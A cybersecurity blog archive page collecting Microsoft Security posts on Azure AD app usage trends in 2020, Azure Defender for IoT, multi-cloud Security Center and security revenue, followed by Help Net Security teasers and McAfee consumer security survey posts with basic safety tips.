Category Archives: Cybersecurity

The state of apps by Microsoft identity: Azure AD app gallery apps that made the most impact in 2020

2020 was an unprecedented year, to say the least. The COVID-19 global pandemic drastically changed how we work, learn, and collaborate. Organizations had to find new ways to connect and maintain productivity while providing secure access to critical apps and resources. Our own Microsoft services, like Teams, served as the lifeline for remote and hybrid work and learning during the pandemic—growing rapidly from 44 million daily active users in March 2020 to 115 million daily active users this past October. But we know that businesses need many tools and apps to succeed, and our commitment is to ensure that solutions work seamlessly and securely across platforms and extend to all clouds and apps.

Recently, we analyzed enterprise cloud app usage and took a deeper look at how and what applications organizations are securing with Azure Active Directory (Azure AD). In our analysis, we looked at organizations’ application usage within our Azure AD app gallery, excluding Microsoft applications such as Azure, Dynamics 365, Office 365, and Teams. Our Azure AD app gallery enables organizations to quickly secure and manage apps of all types and includes thousands of pre-integrated apps. We’re seeing customers of all sizes integrate all their apps with Azure AD to give their workforce a more convenient and secure experience. Read on for insights into how app usage shifted in 2020 compared to the years prior.

The rise of security and collaboration apps to enable remote work

The challenges of 2020 forced leaders to rethink their priorities to ensure their teams can securely access apps from anywhere, anytime. The statistics reflect this. For example, the number of monthly active users of Azure AD app gallery apps has increased 109 percent year-over-year. And last year, when Microsoft surveyed 800 business leaders about their views of the pandemic threat landscape, they listed “Providing secure remote access to resources, apps, and data” as their number one challenge.

Line graph showing Azure AD app gallery monthly active users has grown over 109% year-over-year.

It’s no surprise, then, that apps and services that help ensure secure, remote access to on-premises, and cloud resources grew tremendously last year. Organizations have recognized that remote access to all apps including legacy, on-premises apps have become critically important in the new way of work. Security tools like Citrix ADC, Palo Alto Networks Prisma Access, and Zscaler Private Access, which help employees securely access any app regardless of location, have become business-critical, making them some of the fastest-growing applications in our app gallery this past year.

In addition to increasing investments in the security space, communication, and collaboration apps have been instrumental to ensure business continuity. We recognize that securing any app is a team effort, so we work closely with app providers of all types to integrate with Azure AD, even Microsoft competitors. Apps like Cisco Webex, Google Cloud / Google Workspace, Workplace from Facebook, and Zoom are some of the top apps Azure AD secures to help organizations maintain productivity while helping people feel more connected.

We’ve also continued to see a few apps consistently in our most popular apps list. Human Resource apps like SAP SuccessFactors and Workday and IT Service Management apps like ServiceNow continue to see widespread usage among our customers in 2020.

The top apps of 2020

The global pandemic clearly had an impact on which apps were used the most. Companies shifting to remote work improved productivity with apps that strengthened communication, collaboration, and security.

For the first time, security apps like Palo Alto Networks Prisma Access and Zscaler Private Access made their way to the top 15 apps by monthly active users. Other newcomers to the top 15 apps list include collaboration and communication apps; Workplace from Facebook and Zoom. Zoom not only made its 2020 debut within the top 15 on this list, it catapulted to number 5.

Table showing the top 15 applications in the Azure AD app gallery by monthly active users in 2020, 2019 and 2018.

ServiceNow continues to lead in monthly active users for the third year in a row. Google Cloud / Google Workspace, SAP SuccessFactors, and Workday have maintained their leading ranks through the years, as organizations of all sizes need HR, IT Service Management, and general productivity applications.

From Q1 2020 to Q2 2020, as the global pandemic hit, many of these top apps accelerated in usage to help provide secure remote access for users and to help manage their digital workflows.

Line graph that shows monthly active users of the top 15 applications by monthly active users graphed from Q3 2018 to Q4 2020.

We also noticed some subtle differences when comparing the most popular apps by monthly active users with the most popular apps by the number of organizations. Popularity by the number of organizations looks at the apps most used among our customers. With organizations relying more heavily on video conferencing, Zoom made the jump from number 10 in 2018 to number 1 in 2020, pushing list leaders like Google Cloud / Google Workspace, and Salesforce from the top two spots.

In addition to Zoom, KnowBe4 Security Awareness made its way to the top 5 apps in 2020. It rose from number 12 in 2018 to number 8 in 2019, increasing steadily in usage from the beginning of quarter two 2020 to the end of the year, stressing the importance of security training and awareness within the workforce.

Table showing the top 15 applications in the Azure AD app gallery by number of organizations in 2020, 2019, 2018.

Cisco Webex, DocuSign, Mimecast Personal Portal, and Palo Alto Networks Prisma Access made their first appearance on this list in 2020, reinforcing the shifts we’ve seen throughout our analysis.

Unlike the security and collaboration apps that topped the list, apps like SAP Concur, a travel and expense management service, dropped off the top 15 list. Due to travel restrictions, those used to traveling regularly for work have swapped out face-to-face meetings for virtual calls from home.

Line graph that shows number of organizations of the top 15 applications by number of organizations graphed from Q3 2018 to Q4 2020.

The most popular apps by organization size

When we analyzed the most popular apps used based on organization size, we found several apps commonly deployed in organizations of all sizes: Google Cloud / Google Workspace, Salesforce, and Zoom.

In contrast, deployment of HR and IT service management apps, necessary to ensure business continuity during the pandemic, differ based on the organization size. These apps have not only helped enable remote onboarding and offboarding, but they’ve also helped IT teams fulfill employee requests for applications, devices, or services.

While enterprise and mid-market organizations use HR apps such as SAP SuccessFactors and Workday, small businesses commonly use BambooHR. And HR apps like UltiPro and Cornerstone OnDemand are used more by mid-market businesses.

Enterprise and mid-market organizations regularly deploy the IT service management app ServiceNow, while small businesses predominantly use Freshservice.

The top 10 most popular apps in the Azure AD app gallery based on organization size. Organization size based on enterprise (5000+ monthly active users), mid-market (250-4999 monthly active users) and small business (<250 monthly active users).

The most popular apps by industry

The same broad trends and app usage apply to the most popular apps by industry. Apps like Google Cloud / Google Workspace, Salesforce, ServiceNow, Workday, and Zoom are popular across all industries. Security, collaboration, and workflow management were priorities this past year despite the differences between each industry.

One industry, education, had a distinct set of popular apps, with apps like Brightspace, Canvas, and Clever ranking in the top five. These learning management systems helped schools and institutions adapt to remote learning and became central hubs for digital instruction this past year.

For shift-based industries that rely on frontline workers, like Retail and Healthcare, Kronos is a popular app to help with workforce management activities like employee scheduling.

The top 5 most popular apps in the Azure AD app gallery based on industry. Industries include travel, telecom, retail, professional services, manufacturing, healthcare, government, financial services, education, consumer goods, automotive, energy

The most popular apps by category

This year, we also analyzed the most popular apps across app categories based on monthly active users. We looked at the top five apps across 10 app categories, ranging from education apps to security apps to IT service management apps, as summarized in the table below.

The top 5 most popular apps in the Azure AD app gallery based on application category. Categories include, education, human resources, security, IT service management, data services, travel and expenses, CRM, communication and collaboration, content management, project management.

2020’s fastest-growing apps

Apps that help employees with secure remote work are not only some of the most popular but also among the fastest-growing. Half of the top 10 fastest growing apps in 2020 were security-focused. Apps from our secure hybrid access partnerships—Citrix ADC, Palo Alto Networks Prisma Access, and Zscaler Private Access—which enable customers to access legacy and on-premises apps, have also grown quickly. Other security apps include Cisco Umbrella, the fastest growing app this past year, and BeyondTrust Remote Support.

Zoom saw extraordinary growth in 2020. Its place as the third fastest-growing app this past year is particularly impressive given it was already popular and widely used. Data management and analytics solutions grew quickly this year too. Snowflake and SAP Analytics Cloud became the eighth and ninth fastest-growing apps, respectively.

This past year also saw Amazon Business become one of the fastest-growing apps. Amazon Business is a marketplace that simplifies the purchasing process and helps get products into the hands of organizations. The pandemic accelerated online shopping for consumers and it’s no different for businesses. Businesses have shifted their purchasing and procurement to online with Amazon Business becoming the fifth fastest growing app in 2020.

Bar chart showing the fastest growing apps by year-over-year percentage growth by monthly active users in the Azure AD app gallery in 2020.

Secure digital transformation

Whether we look at the most popular apps by monthly active users, the number of organizations, industries, or customer type, or we look at the fastest growing apps of 2020, investment in security is an undeniable trend. The pandemic has both accelerated digital transformation timelines and increased the need for advanced security that organizations can rely on to provide secure access to their users wherever they may be working.

We’ve seen more users turn on security capabilities like multi-factor authentication (MFA)—the number of monthly active users utilizing MFA with Azure AD has grown 150 percent year-over-year. Passwordless technology also experienced a breakthrough year. Passwordless usage in Azure AD went up by more than 50 percent for Windows Hello for Business, passwordless phone sign-in with Microsoft Authenticator, and FIDO2 security keys.

Our own Azure AD App Proxy service, which helps organizations with remote access to critical on-premises apps, also experienced huge growth this past year. From February to March, the number of monthly active users spiked by roughly 60 percent as the global pandemic started to take hold. Since then, the number of monthly active users has continued to rise, increasing by roughly 100 percent year-over-year. Thanks to Azure AD App Proxy, organizations have been able to quickly provide secure, remote access to mission-critical apps that reside on-premises or use legacy authentication protocols like HTTP or header-based.

Line graph showing Azure AD app proxy monthly active users has grown over 100% year-over-year.

That’s a wrap on 2020

Users, organizations, and industries alike are investing in improving security and collaboration. Cloud-based apps that provide secure access and reliable communication have become a vital part of organizations’ day-to-day operations.

App adoption is growing, and the changing digital landscape has changed the way people work. From security apps like Palo Alto Networks Prisma Access to education apps like Blackboard Learn and communication apps like Zoom or Teams, people are relying more heavily on cloud apps to get their work done. We expect these trends to continue past 2020 as security remains a top priority and remote work continues to require advanced communication and collaboration capabilities. In the wake of 2020, companies will continue to evaluate the cultural and business impact of the shift to remote work and to try to understand where that shift will take them in 2021.

Connecting all of your apps to Azure AD can help safeguard and streamline access while simplifying management and reducing costs. In fact, Forrester estimates that customers can gain a 123 percent return on investment by secure all apps with Azure AD. To learn how to help your employees working from home remain productive, visit our secure remote work resources or read the Top 5 ways Azure AD can help you enable remote work. We hope you’ve enjoyed this year’s app trends data report, which you can also download here, and we look forward to seeing you next year.


Microsoft takes privacy seriously. We remove all personal data and organization-identifying data, such as company name, from the data before using it to produce reports. We never use customer content such as information within an email, chat, document, or meeting to produce reports. Application usage and trend data in this report was analyzed based on applications available in the Azure AD app gallery. We excluded Microsoft owned applications from the data such as Office 365, Teams, Azure, Dynamics, LinkedIn, GitHub, and other Microsoft applications from this report. The report includes data from December 31, 2018, to December 31, 2020.

The post The state of apps by Microsoft identity: Azure AD app gallery apps that made the most impact in 2020 appeared first on Microsoft Security.

Announcing the general availability of Azure Defender for IoT

As businesses increasingly rely on connected devices to optimize their operations, the number of IoT and Operational Technology (OT) endpoints is growing dramatically—industry analysts have estimated that CISOs will soon be responsible for an attack surface multiple times larger than just a few years ago.

Today we are announcing that Azure Defender for IoT is now generally available.

Defender for IoT adds a critical layer of security for this expanding endpoint ecosystem. In contrast to user devices (laptops and phones) and server infrastructure, many IoT and OT devices do not support the installation of agents and are currently unmanaged and therefore invisible to IT and security teams. Without this visibility, it is extremely challenging to detect if your IoT and OT infrastructure has been compromised. Further increasing risk, many of these devices were not designed with security in mind and lack modern controls such as strong credentials and automated patching.

As a result, there is understandable concern about Cyber-Physical System (CPS) risk in OT and industrial control system (ICS) environments such as electricity, water, transportation, data centers, smart buildings, food, pharmaceuticals, chemicals, oil and gas, and other critical manufactured products. Compared to traditional IT risk, the business risk associated with IoT and OT is distinct and significant:

  • Production downtime, resulting in revenue impact and critical shortages.
  • Theft of proprietary formulas and other sensitive intellectual property, causing loss of competitive advantage.
  • Safety and environmental incidents, leading to brand impact and corporate liability.

Traditional security tools developed for IT networks are unable to address these risks as they lack awareness of specialized industrial protocols such as Modbus, DNP3, and BACnet and this different class of equipment from manufacturers like Rockwell Automation, Schneider Electric, Emerson, Siemens, and Yokogawa.

Proactive IoT and OT security monitoring and risk visibility

With Defender for IoT, industrial and critical infrastructure organizations can now proactively and continuously detect, investigate, and hunt for threats in their IoT and OT environments. Incorporating specialized IoT and OT aware behavioral analytics and threat intelligence from our recent acquisition of CyberX, Azure Defender for IoT is an agentless security solution for:

  • Auto-discovery of IoT and OT assets.
  • Identification of vulnerabilities and prioritizing mitigations.
  • Continuously monitoring for IoT and OT threats, anomalies, and unauthorized devices.
  • Delivering unified IT and OT security monitoring and governance. This is achieved via deep integration with Azure Sentinel, Microsoft’s cloud-native SIEM and SOAR platform, for sharing rich contextual information about IoT and OT assets and threats related to incidents. Support is also provided for other SOC workflows and security stacks including Splunk, IBM QRadar, and ServiceNow.

Azure Defender for IoT provides comprehensive IoT and OT security including asset discovery, vulnerability management, and continuous threat detection, combined with deep Azure Sentinel integration

Azure Defender for IoT provides comprehensive IoT and OT security including asset discovery, vulnerability management, and continuous threat detection, combined with deep Azure Sentinel integration.

Fast and flexible deployment options

Defender for IoT is agentless, has deeply embedded knowledge of diverse industrial protocols, and makes extensive use of machine learning and automation, eliminating the need to manually configure any rules or signatures or have any prior knowledge of the environment.

This means that Defender for IoT can typically be rapidly deployed (often in less than a day), making it an ideal solution for organizations with tight deadlines and short plant maintenance windows. Plus, it uses passive, non-invasive monitoring via an on-premises edge sensor which analyzes a copy of the network traffic from a SPAN port or TAP—so there’s zero impact on IoT and OT network performance or reliability.

To provide customers flexibility and choice, Defender for IoT offers multiple deployment options:

  • On-premises for highly regulated or sensitive environments.
  • Azure-connected for organizations looking to benefit from the scalability, simplicity, and continuous threat intelligence updates of a cloud-based service, plus integration with the Azure Defender XDR.
  • Hybrid where security monitoring is performed on-premises but selected alerts are forwarded to a cloud-based SIEM like Azure Sentinel.

Onboarding the network sensor to connect to Azure Sentinel via Azure IoT Hub

Onboarding the network sensor to connect to Azure Sentinel via Azure IoT Hub (optional). 

Proven in some of the world’s most complex and diverse environments

The technology delivered with Defender for IoT has been deployed in some of the world’s largest and most complex environments, including:

  • Three of the top 10 U.S. energy utilities, plus energy utilities in Canada, EMEA, and APAC.
  • Three of the top 10 global pharmaceutical companies.
  • Global 2000 firms in manufacturing, chemicals, oil and gas, and life sciences.
  • One of the world’s largest regional water utilities.
  • Building management systems (BMS) for data centers and smart buildings worldwide, including in Microsoft’s own Azure data centers.
  • Multiple government agencies.

Getting started with Azure Defender for IoT

You can try Defender for IoT for free for the first 30 days and for up to 1,000 devices. After that, you pay on a per-device basis in increments of a thousand devices. Visit the product page and getting started pages to learn more.

For more detailed product information:

  • Read our blog post describing the product architecture and capabilities in more detail, titled “Go inside the new Azure Defender for IoT.”
  • Watch our 30-minute Ignite session with a demo showing how integration with Azure Sentinel and IoT and OT-specific SOAR playbooks enable faster detection and response to multistage attacks that cross IT and OT boundaries, using the TRITON attack on a petrochemical facility as an example.
  • If you’re currently using Azure Defender for IoT, read our article about updating it with the latest threat intelligence package for detecting threats related to the compromise of the SolarWinds Orion product and theft of FireEye’s Red Team tools.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Announcing the general availability of Azure Defender for IoT appeared first on Microsoft Security.

Protecting multi-cloud environments with Azure Security Center

We’ve heard from many of you that multi-cloud adoption is becoming a standard operating model for your organization and that it’s challenging to have the right security controls and posture across your environment. Historically, security teams have not had effective tools to secure multi-cloud infrastructure, and often they needed to address the problem by adding more people.

This is why in September we introduced multi-cloud security support in public preview, and today we are excited to announce the general availability of these capabilities. Now you can onboard multi-cloud resources to Azure Security Center, such as Google Cloud Platform (GCP) and Amazon Web Services (AWS), you can protect your servers with Azure Defender for Servers based on Azure Arc, and we’ve added multi-cloud support to Azure Secure Score, making it easier to focus on the most important things to improve your overall security posture.

Thycotic Logo

“Now that Microsoft supports multi-cloud environments—Amazon Web Services and Google Cloud Platform—there’s no reason for us to look at any other vendor. We get everything we need with Azure Defender.”—Terence Jackson, Chief Information Security and Privacy Officer, Thycotic

Learn more about the Thycotic case study.


When we started developing Azure Security Center, our charter was clear—be the best solution to protect Azure Resources. As we listened to customers, we clearly heard the need to protect resources in multiple clouds, and the desire to simplify tools to manage multi-cloud. We have grown to support these broader needs. Azure Security Center now protects not only hybrid but also multi-cloud resources, including AWS and GCP. The following functionality is now generally available to our customers:

  • Customers can connect their AWS or GCP accounts to ASC to get a unified multi-cloud view of security posture. Specifically, AWS Security Hub and GCP Security Command Center detected misconfigurations and findings are now included in our Secure Score Model and Regulatory Compliance Experience.
  • Azure Defender for Servers leverages Azure Arc to simplify the on-boarding and security of virtual machines running in AWS, GCP, and hybrid clouds. This includes automatic agent provisioning, policy management, vulnerability management, embedded EDR, and more.
  • These new features complement the multi-cloud support for Azure Defender for SQL that was released in December.

In addition to new multi-cloud support, Azure Security Center continues to be one of the best of breed solutions to protect Azure resources. Today we are improving the richness of security recommendations in Azure by turning on Azure Security Benchmark as the default security policy for Azure Security Center.  As a result, Azure Secure Score now reflects a much broader set of recommendations and spans a broader set of Azure resources.

Also, the full control set layout of the Azure Security Benchmark in the compliance dashboard is now available to all Azure Security Center customers, including Azure Security Center free tier as well as the existing Azure Defender customers. Customers can now view their compliance relative to the benchmark controls in compliance view while viewing the detailed impact on their Secure Score. By prioritizing remediation of security recommendations using Secure Score metrics, customers can achieve a higher Secure Score and attain their compliance goals, all at the same time.

Finally, in response to your feedback, we have added the ability to exempt resources from the Secure Score both at a subscription level and now at a management group level. This is most useful in cases where you have a third-party technology in place to address a recommendation, such as turning on multi-factor authentication (MFA).

Multi-cloud is going to be a big area of focus for you—and for us—going forward. We are committed to supporting your broad security needs, by continuing to expand our multi-cloud and hybrid support, as well as continuing to provide best of breed solutions to secure Azure. For more information, please visit the Azure Security Center and the Azure Security Center documentation. We are here to listen and build great products that help you thrive—keep the feedback coming.

To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Protecting multi-cloud environments with Azure Security Center appeared first on Microsoft Security.

Microsoft surpasses $10 billion in security business revenue, more than 40 percent year-over-year growth

I joined Microsoft a little more than six months ago—amid a global pandemic and a new norm of remote work, as well as one of the most rapidly evolving threat landscapes in history. We’ve witnessed more sophisticated attacks, like the recent SolarWinds incident, as well as an increase in attack surfaces as devices and online experiences have become more central to the way we work, learn, and live.

In solving these complex challenges alongside our customers and partners, Microsoft takes cybersecurity out of a place of fear and makes it about innovation and empowerment. Every single day, I am inspired by the team here, by their great wisdom, resilience, expertise, and by their commitment to living the mission we espouse.

Yesterday, Satya shared an important milestone for our security business: $10 billion in revenue in the past 12 months representing more than 40 percent year-over-year growth. A number inclusive of our security, compliance, identity and management businesses, and a testament to the trust our customers have placed in us.

What drives us now is creating a true Zero Trust mindset, which we believe is the cornerstone of effective protection, the foundation for organizational resilience, and the future of security. As part of that, I want to explain more about the work we do to help keep our customers secure, what makes us unique and a look at some of our latest innovations.

What makes us different

Our approach to security is unique in the industry. Microsoft has two security superpowers—an integrated approach and our incredible AI and automation. We tackle security from all angles—inside-out and outside-in. It’s why we combine security, compliance, identity, and management as an interdependent whole. In security, a silo is an opportunity for an exploit. No one else brings these critical parts of risk management together, not as a suite but as an approach that solves problems for customers on their terms across clouds and platforms.

Given Microsoft’s footprint across so many technologies, we’ve been in a unique position to think holistically about the core aspects of security: stretching from identity and access management; through endpoint, email, and application security; to data loss prevention and into cloud security and SIEM. We have an approach that is truly end-to-end, and it is notable in how deeply this is embedded in our culture. Microsoft’s security organization is an intense, massive collaboration that drives services, intelligence, technologies, and people—all coming together as one humming machine with a singular mission.

Next, consider the tremendous number of signals we take in across our platforms and services, over eight trillion security signals every 24 hours. Using the latest in machine learning and artificial intelligence techniques—plus the power of smart humans—we put these signals to work on behalf of our customers. In 2020 alone, almost six billion malware threats were blocked on endpoints protected by Microsoft Defender.

Infographic that describes how Microsoft protects devices, secures identities, ensures compliance, and detects threats.

Today we help secure more than 400,000 customers across 120 countries. These range from small businesses to large enterprises, with 90 of the Fortune 100 using four or more of our security, compliance, identity, and management solutions.

Protecting our customers

Today’s world of security is really a cat and mouse game. You have to know what the adversaries and threat actors are up to every single day. However, a cyber-attack is ultimately about safety, a fundamental human need. We’ve seen what happens to people as they’re going through attacks, and it’s not pleasant. So, when we’re talking to customers around the world, our mission is really to give them peace of mind.

We can secure our customers best when we invest in these areas:

  • All clouds, all platforms: We believe that anything less than comprehensive security is no security at all. That’s why our security, compliance, identity, and management solutions work seamlessly across platforms and we strive to extend to all clouds and all apps, whether or not Microsoft is being used throughout the computing environment. A great example of this is Azure Sentinel, our cloud-based SIEM, which in less than a year, is now helping over 9,000 customers protect their cloud workloads. Our commitment to comprehensive security is so absolute that we are empowering our customers to protect their cloud workloads wherever they are hosted, including Amazon Web Services and Google Cloud Platform. And likewise, Microsoft Defender now protects iOS, Android, macOS, and Linux.
  • Simplicity in the face of complexity: In my first customer meeting at Microsoft, on which Satya joined me, a customer told me she just wanted a simple button that would make everything work—could Microsoft help? That really stuck with me. Our customers want to be enablers of innovation in their organizations, and they know that effective security is critical to that work. We must make it easier for them. We hear from our global user community that they want best-in-breed combined with best-in-integration. When faced with complexity, they want greater simplicity. It’s our mission to deliver that and help our customers adapt quickly to a changing world.
  • A vibrant ecosystem: Microsoft welcomes and encourages an industry of strong competition that makes us all better. The Microsoft Intelligent Security Association is a community of more than 175 partner companies who have created over 250 integrations with Microsoft products and services, helping organizations close the gaps between fragmented security solutions and minimize risk. In addition, we delivered an industry record of $13.7 million in bug bounty awards to 327 researchers from more than 55 countries in fiscal year 2020, to help find and address potential vulnerabilities in our products and services before they can be weaponized by malicious actors.

Some new multi-cloud, multi-platform solutions and a look ahead

In addition to our financial news, today we are pleased to share a bit of product news.

Azure Security Center multi-cloud support is now available, including a unified view of security alerts from Amazon Web Services and Google Cloud, as well as enhancements to Azure Defender to protect multi-cloud virtual machines. Today, we are also announcing the availability of Azure Defender for IoT, which adds a critical layer of agentless security for Operational Technology (OT) networks in industrial and critical infrastructure organizations; as well as Application Guard for Office, which opens documents in a container to protect users from malicious content. These new solutions help protect users and businesses across devices, platforms, and clouds.

According to the Microsoft identity 2020 app trends report, out today, providing secure remote access to resources, apps and data became the top challenge for business leaders in the past year. With Azure Active Directory (Azure AD), our cloud identity solution that provides secure and seamless access to 425 million users, organizations can choose from thousands of pre-integrated apps within the Azure AD app gallery, or bring their own apps. Microsoft Cloud App Security helps protect users, ensuring apps like Salesforce, Workday, and ServiceNow can be quickly adopted and safely managed. The enthusiasm we are seeing for both Azure AD and MCAS truly show the importance our customers are placing on secured third party applications.

Our work to make the world more secure for all really does extend to all—from the largest Fortune 100 companies and world governments to individuals. Last week we began rolling out new security features for Microsoft Edge including password generator and Password Monitor, as well as easier to understand options for managing data collection and privacy. We continue to invest in building solutions to help consumers stay more secure and look forward to sharing more in the future.

The milestones and announcements we have today give us an opportunity to celebrate the work of defenders around the world.

As we look to meet the challenges of the future, we’ll continue to invest in a vibrant ecosystem of partners and in building a competitive and cooperative industry that makes us all better. And we are laser-focused on delivering simplicity in face of complexity, so everything works, and our defender community is empowered to do more.

Ultimately security is about people, protecting people, bringing people together, sharing knowledge and tools to collectively strengthen our defenses. We look forward to sharing more in the coming months about new areas of focus and investment as we continue our commitment is to serve this community. We are for defenders, with defenders, and we are defenders ourselves. The fundamental ethos of our efforts is to make the world a safer place for all.

To learn more about Microsoft Security solutions visit our website and watch our webcast to learn how to streamline and strengthen your security.

Bookmark the Security blog to keep up with expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft surpasses $10 billion in security business revenue, more than 40 percent year-over-year growth appeared first on Microsoft Security.

Streamlining cloud compliance through automation

As companies migrate to the cloud to take advantage of its scalability and flexibility, many don’t fully realize how this move will affect their compliance with cybersecurity and privacy requirements mandated by laws and standards such as SOX, CCPA, SOC 2, PCI DSS or ISO 27001. While the cloud offers significant freedom, it also creates new pain points around achieving compliance with these requirements, especially when first moving compliant workloads from on-premises data centers to … More

The post Streamlining cloud compliance through automation appeared first on Help Net Security.

Cybersecurity marketing: Always think of the customer

In early January, LogMeIn announced that Jamie Domenici will join the company as its new Chief Marketing Officer. Domenici is a cloud marketing veteran, and the majority of her career has been focused on ensuring businesses (especially small and medium businesses) have the right software for success. At LogMeIn, she will oversee a nearly 200 person marketing team consisting of Customer Marketing, Product Marketing, Acquisition Marketing, Marketing Operations, Corporate Communications, Brand & Creative, and Web … More

The post Cybersecurity marketing: Always think of the customer appeared first on Help Net Security.

Privacy is not a one-time, check the box activity

New research from ISACA reveals critical skills gaps and insufficient training. The survey report also explores past and future trends in privacy, offering insights into privacy workforce and skills, the use of privacy by design, and the organizational structure and composition of privacy teams. Privacy by design Survey findings—gathered in Q3 2020 from 1,873 professionals who work in data privacy or have knowledge of their organizations’ data privacy functions—show some positive trends for those enterprises … More

The post Privacy is not a one-time, check the box activity appeared first on Help Net Security.

The complexity of moving legacy apps remains a huge cloud migration challenge

85% of IT decision makers are planning to increase their IT budgets for 2021, with cloud migration as a priority, a Next Pathway survey reveals. 65% of companies indicate the initiative is a top three area of technology emphasis in 2021. Looking at specific applications, IT decision makers cited migrating their data warehouse to the cloud as the most important. The key themes revealed in the survey include: Cloud migration is a journey – Most … More

The post The complexity of moving legacy apps remains a huge cloud migration challenge appeared first on Help Net Security.

Isolation-based security technologies are gaining prominence

Cyberinc shared its insights into the key trends that will shape the cybersecurity industry in the coming year. With evolving tactics that increase the risk and impact of ransomware and phishing, combined with the new normal of remote workforces, Cyberinc CEO Samir Shah believes that remote browser isolation (RBI) will prove its value as a critical must-have enterprise technology in 2021. “As mass-scale ransomware and other malware attacks continue to make headlines, companies and IT … More

The post Isolation-based security technologies are gaining prominence appeared first on Help Net Security.

Most with in-house security teams are considering outsourcing security efforts

Syntax surveyed 500 IT decision-makers in the US on the impact of the COVID-19 pandemic on their businesses and strategic decisions they’ll make in 2021. 2020 was a year of unexpected and rapid digital transformation for IT leaders across industries. 89% of respondents report that the pandemic accelerated their enterprises’ digital transformation last year. As a result, IT teams are stretched even thinner implementing secure and collaborative work-from-home environments, onboarding new technologies, and managing their … More

The post Most with in-house security teams are considering outsourcing security efforts appeared first on Help Net Security.

New Year, New Digital You: Consumer Security Findings from McAfee’s Latest Report

Digital You

New Year, New Digital You: Consumer Security Findings from McAfee’s Latest Report 

2020 was a year unlike any other. We transitioned from the corporate office to the home office, participated in distance learning, and figured out how to communicate with one another from afar. We sought out new forms of entertainment by streaming countless movies and TV shows and found new ways to stay active with at-home workouts. But none of this would’ve been possible without our devices and the technology we rapidly adopted.  In fact, data shows that we accelerated five years forward in digital adoption during the first two months of the pandemic alone.  And according to findings from our 2021 Consumer Security Mindset Report , online alternatives will continue to replace activities in people’s lives and routines that were once in-person.

Online Alternatives Are Here to Stay

In the past year, many of us started to use or increased our use of various online tools. For example, online banking usage increased from 22% in 2020, online fitness classes increased by 7%, and virtual doctor’s appointments increased by 9%. We’ve adapted to the convenience of these online alternatives and have used them to replace activities that were once primarily in-person. Additionally, 77% of survey respondents indicated that they now use or have adopted common features designed for convenience, such as text and email notifications, web or mobile applications versus desktop sites, and more.

Online alternatives will continue to replace activities in people’s lives that were once in-person. According to our survey, the top digital activities that will remain part of our routines even as social distancing and stay-at-home restrictions lift include online banking, social engagements, and personal shopping. But as we continue to rely on technology to complete these tasks, how are we adapting our security habits to greater time spent online?

New Digital Worlds Also Means an Increase in New Digital Threats

The more time we spend online interacting with various apps and services, the greater our exposure is to potential cybersecurity risks and threats. So, as we continue to adapt to and embrace our new digital world, hackers are simultaneously taking notes. Survey results show that 71% of respondents are most concerned about their financial data being stolen or compromised, while 68% are concerned that their personal information could get hacked.

A heightened sense of security is of the utmost importance so we can continue to live our digital lives free from worry. But 29% of survey respondents don’t feel very confident about their ability to prevent a cyberattack and believe that they don’t have what they need to prevent one. And while another 40% is confident in their ability to prevent an attack, they think they could better understand how to identify or combat threats.

Even with these concerns, there still appears to be a discrepancy between our perceptions around online security versus our actions. While 70% of respondents stated that they purchased at least one connected device in 2020, only 50% bought security software, and only a quarter admitted that they check if their security software is up to date. But to preserve our digital wellness as we adopt new technology into our lives, we must upgrade our security habits in tandem. After all, it’s better to prevent a problem than be in a position of having to fix it.

Stay One Step Ahead of Hackers in 2021 and Beyond

To help prevent a hacker from striking, it helps to think about why they would want your data in the first place. However, over half of U.S. respondents admitted that they never considered how much their online data is worth. Hackers are always looking for ways to exploit others for money. By scavenging and stealing our personally identifiable information over the internet, hackers can piece together our identities – a valuable asset and can be sold for a lot of cash.

New Digital You Infographic

To stay one step ahead of hackers and protect your digital wellness into the new year and beyond, continue to work on your own online habits and follow these security tips:

Use multi-factor authentication

Two or multi-factor authentication provides an extra layer of security, as it requires multiple forms of verification like texting or emailing a secure code to verify your identity. Most popular online sites like Gmail, Dropbox, LinkedIn, Facebook, etc. offer multi-factor authentication, and it takes just a few minutes to set it up. This reduces the risk of successful impersonation by criminals who may have uncovered your information by keyboard snooping.

Connect with caution

Hackers tend to lurk in the shadows on public Wi-Fi networks to catch unsuspecting users looking for free internet access. If you have to conduct transactions on a public Wi-Fi network, use a virtual private network (VPN) like McAfee® Safe Connect to help keep you safe while you’re online.

Browse with added security

Use a comprehensive security solution, like McAfee Total Protection, which can help protect devices against malware, phishing attacks, and other threats. It includes McAfee WebAdvisor, which can help identify malicious websites.

Enable security settings

When using third-party tools like video conferencing platforms, adjust your security settings by password protecting your meetings and blocking other meeting attendees from sharing their screens. You can also adjust your device’s app permissions to only access your location when actively in use, or enable safe browsing options to protect you from malicious websites.

Stay Updated  

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.


The post New Year, New Digital You: Consumer Security Findings from McAfee’s Latest Report appeared first on McAfee Blogs.

New Year, New Digital You: Canadian Survey Findings from McAfee

Digital You

New Year, New Digital You: Canadian Survey Findings from McAfee

McAfee is headquartered in the U.S. and with our impressive global footprint protecting over 600 million devices protecting users’ connected lives isn’t just a priority for one location, but for the entire world that we serve.  As Site Leader of our Consumer Ontario offices, when it came time to reflect on the past year, we knew it was important to gather findings for the communities we protect including those in Canada.

In 2020, we abruptly transitioned from offices to home workspaces, participated in distance learning, and figured out how to stay connected with friends and family from afar. We sought out new forms of entertainment by streaming countless movies and TV shows and found new ways to stay active with at-home workouts. None of this would’ve been possible without our devices and the technologies we rapidly adopted. In fact, data shows that we accelerated five years forward in digital adoption during the first two months of the pandemic alone. And according to findings from our 2021 Consumer Security Mindset Report, Canadian consumers plan to stick with this digital-first lifestyle in the new year and beyond.

In the past year, many of us started to use or increased our use of various online tools. In Canada, online banking surged to 78%, personal shopping to 63%, and social engagements to 59%. We’ve adapted to the convenience of these online alternatives and have used them to replace activities that were once primarily in-person. In fact, 70% of survey respondents indicated that they now use or have adopted common features designed for convenience, such as text and email notifications, web or mobile applications versus desktop sites, and more.

